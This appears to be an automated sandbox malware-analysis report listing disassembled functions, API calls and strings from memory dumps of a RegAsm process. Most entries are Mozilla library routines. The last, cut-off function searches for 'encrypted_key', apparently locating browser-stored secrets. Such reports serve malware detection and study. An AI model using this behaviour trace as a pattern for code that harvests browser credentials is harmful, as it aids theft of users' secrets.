Instruction Fuzzy Hash: 41015239A89227B56A223631AD81FBF1E5C8D86F807151037E845A2188DB5C998355FD

Function 6C025E60 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 182threadstringtimeCOMMON

Download Yara Rule

APIs

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C025E9D

Part of subcall function 6C035B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C0356EE,?,00000001), ref: 6C035B85
Part of subcall function 6C035B50: EnterCriticalSection.KERNEL32(6C09F688,?,?,?,6C0356EE,?,00000001), ref: 6C035B90
Part of subcall function 6C035B50: LeaveCriticalSection.KERNEL32(6C09F688,?,?,?,6C0356EE,?,00000001), ref: 6C035BD8
Part of subcall function 6C035B50: GetTickCount64.KERNEL32 ref: 6C035BE4

GetCurrentThreadId.KERNEL32 ref: 6C025EAB
GetCurrentThreadId.KERNEL32 ref: 6C025EB8
strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C025ECF
memcpy.VCRUNTIME140(00000000,GeckoMain,00000000), ref: 6C026017

Part of subcall function 6C014310: moz_xmalloc.MOZGLUE(00000010,?,6C0142D2), ref: 6C01436A
Part of subcall function 6C014310: memcpy.VCRUNTIME140(00000023,?,?,?,?,6C0142D2), ref: 6C014387

moz_xmalloc.MOZGLUE(00000004), ref: 6C025F47
GetCurrentProcess.KERNEL32 ref: 6C025F53
GetCurrentThread.KERNEL32 ref: 6C025F5C
GetCurrentProcess.KERNEL32 ref: 6C025F66
DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C025F7E
moz_xmalloc.MOZGLUE(00000024), ref: 6C025F27

Part of subcall function 6C02CA10: mozalloc_abort.MOZGLUE(?), ref: 6C02CAA2

moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C0255E1), ref: 6C025E8C

Part of subcall function 6C02CA10: malloc.MOZGLUE(?), ref: 6C02CA26

moz_xmalloc.MOZGLUE(00000050,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C0255E1), ref: 6C02605D
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C0255E1), ref: 6C0260CC

Strings

GeckoMain, xrefs: 6C025ECE, 6C026015

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: Currentmoz_xmalloc$Thread$CriticalProcessSectionmemcpy$Count64CounterDuplicateEnterHandleLeaveNow@PerformanceQueryStamp@mozilla@@TickTimeV12@_freemallocmozalloc_abortstrlen
String ID: GeckoMain
API String ID: 3711609982-966795396
Opcode ID: b9936ea2b2d98b8a6ea5e6a13aa8c2e4642ab451b93c5939d3b2aed41507e5de
Instruction ID: fc7c3540533b587cece2db2f6186bff7d3f08c34aa40f6c8ce575bb1a19324f7
Opcode Fuzzy Hash: b9936ea2b2d98b8a6ea5e6a13aa8c2e4642ab451b93c5939d3b2aed41507e5de
Instruction Fuzzy Hash: 1671C0B4A047409FD710DF29C480B6ABBF4FF49308F54596DE58A87B52DB74E848CB92

Function 6C029590 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 192libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C0131C0: LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6C013217
Part of subcall function 6C0131C0: GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6C013236
Part of subcall function 6C0131C0: FreeLibrary.KERNEL32 ref: 6C01324B
Part of subcall function 6C0131C0: __Init_thread_footer.LIBCMT ref: 6C013260
Part of subcall function 6C0131C0: ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6C01327F
Part of subcall function 6C0131C0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C01328E
Part of subcall function 6C0131C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C0132AB
Part of subcall function 6C0131C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C0132D1
Part of subcall function 6C0131C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C0132E5
Part of subcall function 6C0131C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C0132F7

LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C029675
__Init_thread_footer.LIBCMT ref: 6C029697
LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C0296E8
GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C029707
__Init_thread_footer.LIBCMT ref: 6C02971F
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C029773
GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C0297B7
FreeLibrary.KERNEL32 ref: 6C0297D0
FreeLibrary.KERNEL32 ref: 6C0297EB
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C029824

Strings

Api-ms-win-core-memory-l1-1-5.dll, xrefs: 6C029670
ntdll.dll, xrefs: 6C0296E3
MapViewOfFileNuma2, xrefs: 6C0297B1
NtMapViewOfSection, xrefs: 6C029701

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: LibraryTime$StampV01@@Value@mozilla@@$AddressFreeInit_thread_footerLoadProc$ErrorLastStamp@mozilla@@$Creation@Now@ProcessV12@V12@_
String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
API String ID: 3361784254-3880535382
Opcode ID: ca63e951693f79a002aa7c2b4cc5509085dab1c6525ca08566674e3d88331fee
Instruction ID: 2f486d9629967f49d7f2485ecc4a82d1700059aa2e0d37f22648d0d2943f6473
Opcode Fuzzy Hash: ca63e951693f79a002aa7c2b4cc5509085dab1c6525ca08566674e3d88331fee
Instruction Fuzzy Hash: C561E371704205DBDF00DFA5D888B9ABBF8FB4A324F109529FD5993B80DB34AA54CB91

Function 6C027FD0 Relevance: 24.2, APIs: 16, Instructions: 166COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(000000FF,00000000,00000000,?), ref: 6C028007
moz_xmalloc.MOZGLUE(?,000000FF,00000000,00000000,?), ref: 6C02801D

Part of subcall function 6C02CA10: malloc.MOZGLUE(?), ref: 6C02CA26

memset.VCRUNTIME140(00000000,00000000,?,?), ref: 6C02802B
K32EnumProcessModules.KERNEL32(000000FF,00000000,?,?,?,?,?,?), ref: 6C02803D
moz_xmalloc.MOZGLUE(00000104,000000FF,00000000,?,?,?,?,?,?), ref: 6C02808D

Part of subcall function 6C02CA10: mozalloc_abort.MOZGLUE(?), ref: 6C02CAA2

memset.VCRUNTIME140(00000000,00000000,00000104,?,?,?,?,?), ref: 6C02809B
GetModuleFileNameW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6C0280B9
moz_xmalloc.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6C0280DF
memset.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0280ED
wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0280FB
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C02810D
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6C028133
free.MOZGLUE(00000000,000000FF,00000000,?,?,?,?,?,?), ref: 6C028149
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?), ref: 6C028167
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 6C02817C
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C028199

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: free$memsetmoz_xmalloc$EnumModulesProcess$ErrorFileLastModuleNamemallocmozalloc_abortwcscpy_s
String ID:
API String ID: 2721933968-0
Opcode ID: a513433857d44b343be8457b133ef8350eff71ef5b60d94cb3ece5c2cf46dfdd
Instruction ID: 88ef0b6fa1a82ef03902d9caef88f5187e6127f63ca8b67feb823d1a46a50bcc
Opcode Fuzzy Hash: a513433857d44b343be8457b133ef8350eff71ef5b60d94cb3ece5c2cf46dfdd
Instruction Fuzzy Hash: C95183B6E002149BDF00DFA5DC84BAFB7FDAF49624F144225E915E7781E734A904CBA1

Function 6C076660 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 162threadCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(6C09F618), ref: 6C076694
GetThreadId.KERNEL32(?), ref: 6C0766B1
GetCurrentThreadId.KERNEL32 ref: 6C0766B9
memset.VCRUNTIME140(?,00000000,00000100), ref: 6C0766E1
EnterCriticalSection.KERNEL32(6C09F618), ref: 6C076734
GetCurrentProcess.KERNEL32 ref: 6C07673A
LeaveCriticalSection.KERNEL32(6C09F618), ref: 6C07676C
GetCurrentThread.KERNEL32 ref: 6C0767FC
memset.VCRUNTIME140(?,00000000,000002C8), ref: 6C076868
RtlCaptureContext.NTDLL ref: 6C07687F

Strings

WalkStack64, xrefs: 6C076890

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: CriticalCurrentSectionThread$memset$CaptureContextEnterInitializeLeaveProcess
String ID: WalkStack64
API String ID: 2357170935-3499369396
Opcode ID: 02afe786b5100988081fab4396818735c444e78f26d8cf16b32278e726934089
Instruction ID: f3e27e300ced0f0f09cc6559b09c11752e2380d9f8a7f030124be56b07d357e1
Opcode Fuzzy Hash: 02afe786b5100988081fab4396818735c444e78f26d8cf16b32278e726934089
Instruction Fuzzy Hash: D0518F71A09301AFDB25CF25C844B5EBBF8BF89714F00892DF59A97640DB74E904CBA6

Function 6C05DE60 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 135threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C059420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C024A68), ref: 6C05945E
Part of subcall function 6C059420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C059470
Part of subcall function 6C059420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C059482
Part of subcall function 6C059420: __Init_thread_footer.LIBCMT ref: 6C05949F

GetCurrentThreadId.KERNEL32 ref: 6C05DE73
GetCurrentThreadId.KERNEL32 ref: 6C05DF7D
AcquireSRWLockExclusive.KERNEL32(6C09F4B8), ref: 6C05DF8A
ReleaseSRWLockExclusive.KERNEL32(6C09F4B8), ref: 6C05DFC9
GetCurrentThreadId.KERNEL32 ref: 6C05DFF7
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C05E000
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6C024A68), ref: 6C05DE7B

Part of subcall function 6C0594D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C0594EE
Part of subcall function 6C0594D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C059508

Part of subcall function 6C04CBE8: GetCurrentProcess.KERNEL32(?,6C0131A7), ref: 6C04CBF1
Part of subcall function 6C04CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0131A7), ref: 6C04CBFA

?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6C024A68), ref: 6C05DEB8
free.MOZGLUE(00000000,?,6C024A68), ref: 6C05DEFE
?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C05DF38

Strings

[I %d/%d] locked_profiler_stop, xrefs: 6C05DE83
[I %d/%d] profiler_set_process_name("%s", "%s"), xrefs: 6C05E00E
<none>, xrefs: 6C05DFD7

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: CurrentThread$getenv$ExclusiveLockProcessRelease_getpid$AcquireBufferEnterExit@mozilla@@Init_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@ProfilerRegisterTerminate__acrt_iob_func__stdio_common_vfprintffree
String ID: <none>$[I %d/%d] locked_profiler_stop$[I %d/%d] profiler_set_process_name("%s", "%s")
API String ID: 1281939033-809102171
Opcode ID: 69bd81539613be4726a691b6c6c292585afafd5ae2de62e8850c14531d8a26f9
Instruction ID: e2fc39b89480c60fba7658cf5a9ec31e608569cfc12714a3fc8a8977906991b2
Opcode Fuzzy Hash: 69bd81539613be4726a691b6c6c292585afafd5ae2de62e8850c14531d8a26f9
Instruction Fuzzy Hash: 5B41E6757012109BDB109F64DA047AA77F9FB4531CF940016F90997B41CF31A825CBE2

Function 6C06D840 Relevance: 21.2, APIs: 14, Instructions: 206threadtimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C06D85F
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C06D86C
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C06D918
GetCurrentThreadId.KERNEL32 ref: 6C06D93C
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C06D948
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C06D970
GetCurrentThreadId.KERNEL32 ref: 6C06D976
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C06D982
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C06D9CF
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C06DA2E
GetCurrentThreadId.KERNEL32 ref: 6C06DA6F
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C06DA78
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE ref: 6C06DA91

Part of subcall function 6C035C50: GetTickCount64.KERNEL32 ref: 6C035D40
Part of subcall function 6C035C50: EnterCriticalSection.KERNEL32(6C09F688), ref: 6C035D67

ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C06DAB7

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$Count64CriticalEnterSectionStampTickTimeV01@@Value@mozilla@@Xbad_function_call@std@@
String ID:
API String ID: 1195625958-0
Opcode ID: e3df590a569425ce6e7a5bd078ae97632a1cb766cce0beee46bdda6d2e4a8183
Instruction ID: 126a265588ba791284bcac90a13b91ac8817a50a1a6f342f158caf59f130cc86
Opcode Fuzzy Hash: e3df590a569425ce6e7a5bd078ae97632a1cb766cce0beee46bdda6d2e4a8183
Instruction Fuzzy Hash: C7719D756043049FCB00DF2AC884B9ABBF5FF89324F25856DE85A9B711DB30A944CBA1

Function 6C06D4D0 Relevance: 21.2, APIs: 14, Instructions: 165threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C06D4F0
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C06D4FC
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C06D52A
GetCurrentThreadId.KERNEL32 ref: 6C06D530
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C06D53F
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C06D55F
free.MOZGLUE(00000000), ref: 6C06D585
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C06D5D3
GetCurrentThreadId.KERNEL32 ref: 6C06D5F9
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C06D605
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C06D652
GetCurrentThreadId.KERNEL32 ref: 6C06D658
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C06D667
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C06D6A2

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
String ID:
API String ID: 2206442479-0
Opcode ID: 1007be1cfb456964e615dfe9adaa92168286a0f450886ed81ddd7de0ff70bb9a
Instruction ID: 3f8978c859737b6f4d45292d46ed38c885fb80f15d53171d5af2a4af7bfd8f4b
Opcode Fuzzy Hash: 1007be1cfb456964e615dfe9adaa92168286a0f450886ed81ddd7de0ff70bb9a
Instruction Fuzzy Hash: 92514B71604705DFC714DF25C484B9ABBF9FF89328F109A2EE85A87B11DB30A945CB91

Function 6C011E90 Relevance: 19.6, APIs: 9, Strings: 4, Instructions: 120COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C09E784), ref: 6C011EC1
LeaveCriticalSection.KERNEL32(6C09E784), ref: 6C011EE1
EnterCriticalSection.KERNEL32(6C09E744), ref: 6C011F38
LeaveCriticalSection.KERNEL32(6C09E744), ref: 6C011F5C
VirtualFree.KERNEL32(?,00100000,00004000), ref: 6C011F83
LeaveCriticalSection.KERNEL32(6C09E784), ref: 6C011FC0
EnterCriticalSection.KERNEL32(6C09E784), ref: 6C011FE2
LeaveCriticalSection.KERNEL32(6C09E784), ref: 6C011FF6
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C012019

Strings

Dl, xrefs: 6C011F56
\l, xrefs: 6C011F3E
MOZ_CRASH(), xrefs: 6C012000
Dl, xrefs: 6C011F32

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$FreeVirtualmemset
String ID: Dl$Dl$MOZ_CRASH()$\l
API String ID: 2055633661-2551197105
Opcode ID: 9c12e2529c58f79424c7954b88b7671d56da416cbeb379fa1341e5a9a7f347d1
Instruction ID: 5ca39afd6bf97485a2401b3f7aaa0e3206bb130ed48ba9c172696c1e00bad07e
Opcode Fuzzy Hash: 9c12e2529c58f79424c7954b88b7671d56da416cbeb379fa1341e5a9a7f347d1
Instruction Fuzzy Hash: A341D271B043298BDF108FA9C888B6EB6F5FB59758F040129E92597B41DB719D048BD2

Function 6C035670 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 272timeCOMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_APP_RESTART), ref: 6C0356D1
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C0356E9
?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ.MOZGLUE ref: 6C0356F1
?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z.MOZGLUE ref: 6C035744
??0TimeStampValue@mozilla@@AAE@_K0_N@Z.MOZGLUE(?,?,?,?,?), ref: 6C0357BC
GetTickCount64.KERNEL32 ref: 6C0358CB
EnterCriticalSection.KERNEL32(6C09F688), ref: 6C0358F3
__aulldiv.LIBCMT ref: 6C035945
LeaveCriticalSection.KERNEL32(6C09F688), ref: 6C0359B2
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(6C09F638,?,?,?,?), ref: 6C0359E9

Strings

MOZ_APP_RESTART, xrefs: 6C0356CC

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: Time$CriticalSectionStampStamp@mozilla@@Value@mozilla@@$BaseComputeCount64DurationEnterFromLeaveMilliseconds@Now@PlatformProcessTickTicksUptime@Utils@mozilla@@V01@@V12@___aulldivgetenv
String ID: MOZ_APP_RESTART
API String ID: 2752551254-2657566371
Opcode ID: 7c36af0d7b95d26d2e51b40f57d3282dce66486a777e5958a47f3d0f273612bd
Instruction ID: f125f4eecb025bb570997083612ce3eb81cc3415cecc72df96a880aa4b929111
Opcode Fuzzy Hash: 7c36af0d7b95d26d2e51b40f57d3282dce66486a777e5958a47f3d0f273612bd
Instruction Fuzzy Hash: B2C18F35A097519FDB05CF28C44075AB7F9BFCA714F15AA1EF4C897660DB30A885CB82

Function 6C05EC70 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6C059420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C024A68), ref: 6C05945E
Part of subcall function 6C059420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C059470
Part of subcall function 6C059420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C059482
Part of subcall function 6C059420: __Init_thread_footer.LIBCMT ref: 6C05949F

GetCurrentThreadId.KERNEL32 ref: 6C05EC84
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C05EC8C

Part of subcall function 6C0594D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C0594EE
Part of subcall function 6C0594D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C059508

GetCurrentThreadId.KERNEL32 ref: 6C05ECA1
AcquireSRWLockExclusive.KERNEL32(6C09F4B8), ref: 6C05ECAE
?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6C05ECC5
ReleaseSRWLockExclusive.KERNEL32(6C09F4B8), ref: 6C05ED0A
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C05ED19
CloseHandle.KERNEL32(?), ref: 6C05ED28
free.MOZGLUE(00000000), ref: 6C05ED2F
ReleaseSRWLockExclusive.KERNEL32(6C09F4B8), ref: 6C05ED59

Strings

[I %d/%d] profiler_ensure_started, xrefs: 6C05EC94

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
String ID: [I %d/%d] profiler_ensure_started
API String ID: 4057186437-125001283
Opcode ID: 8f4a9801aa915fe9081aacea7481c28b38390058ccd2cfe8f364f317d53d98ed
Instruction ID: 843899156d3d1b4582cc43700075fbb06c12ca627a37fbe806fb7307352e0a04
Opcode Fuzzy Hash: 8f4a9801aa915fe9081aacea7481c28b38390058ccd2cfe8f364f317d53d98ed
Instruction Fuzzy Hash: 8C21F375600114ABDF009F24D904BAA77FDFB4626DF504211FC2987780DF39E826CBA2

Function 0041580D Relevance: 18.2, APIs: 12, Instructions: 188stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00415845
_memset.LIBCMT ref: 00415856

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?), ref: 00415881
lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 0041589F
lstrcatA.KERNEL32(?,?,?,?,?,?,?,?), ref: 004158B3
lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 004158C6

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99

Part of subcall function 0040819F: StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0040CC90,?,?), ref: 004081E5

